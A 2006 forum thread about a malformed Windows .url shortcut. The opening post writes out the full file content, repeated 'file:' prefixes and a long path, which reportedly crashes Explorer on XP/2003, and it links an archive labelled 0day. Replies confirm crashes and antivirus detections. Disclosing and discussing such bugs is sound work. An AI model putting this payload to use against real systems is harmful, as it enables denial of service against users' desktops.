winxpi Posted July 11, 2006 Posted July 11, 2006 (edited) Hi guys!I don't know if you already heard about it,did you?When you make a .url file with the following content on a Windows XP/2003 running system the Windows Explorer crashes and restartesagain and again:url=file:file:file:file:file:file:file:file:file:file:file:file:file:fil e:file:file:file:file:file:file:file:file:file:file:file:file:file:file:c:\aaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa Too test it simply extract the contents of the .rar file on the desktop. http://hitcon.org/Nanika-desktop_explore_0day.rar Edited July 31, 2006 by winxpi
Delprat Posted July 11, 2006 Posted July 11, 2006 No one but an IA can have discovered this : an human would never have tried such a file ++
Fox Mulder Posted July 11, 2006 Posted July 11, 2006 Woohoo! I just extracted that file to the desktop and explorer.exe went bananas! Had to execute Total Commander to delete the file and have a running shell again, lol.
ncheepooi Posted July 11, 2006 Posted July 11, 2006 !!!!! STUPID POST !!!!! Kaspersky detect the rar file with Exploit.Win32.Nakani.a (Malware)
bledd Posted July 11, 2006 Posted July 11, 2006 ****, thats the shortcut i use for winamp, no wonder i'm having problems
rjdohnert Posted July 13, 2006 Posted July 13, 2006 no crash my friend, sorry. Tried it under Windows Server 2003 R2 and Windows 2000 SP4
winxpi Posted July 31, 2006 Author Posted July 31, 2006 On Windows 98 nothing happens but on crap xp explorer must reload.
MagicAndre1981 Posted August 7, 2006 Posted August 7, 2006 NOD reports it as Win32/Exploit.Nakani.A Trojan.
nitroshift Posted August 7, 2006 Posted August 7, 2006 NOD reports it as Win32/Exploit.Nakani.A Trojan.Same here
Aegis Posted August 9, 2006 Posted August 9, 2006 NOD reports it as Win32/Exploit.Nakani.A Trojan.Well I wonder why... http://hitcon.org/Nanika-desktop_explore_0day.rar
MagicAndre1981 Posted August 9, 2006 Posted August 9, 2006 Well I wonder why... http://hitcon.org/Nanika-desktop_explore_0day.rarSure I know this, but it amazed me to see that NOD reports it as a trojan only a short day after this trick becomes public.
Mr Snrub Posted August 9, 2006 Posted August 9, 2006 Sure I know this, but it amazed me to see that NOD reports it as a trojan only a short day after this trick becomes public.But why a trojan?At best this is an obscure "denial of service", surely?
Recommended Posts
Create an account or sign in to comment
You need to be a member in order to leave a comment
Create an account
Sign up for a new account in our community. It's easy!
Register a new accountSign in
Already have an account? Sign in here.
Sign In Now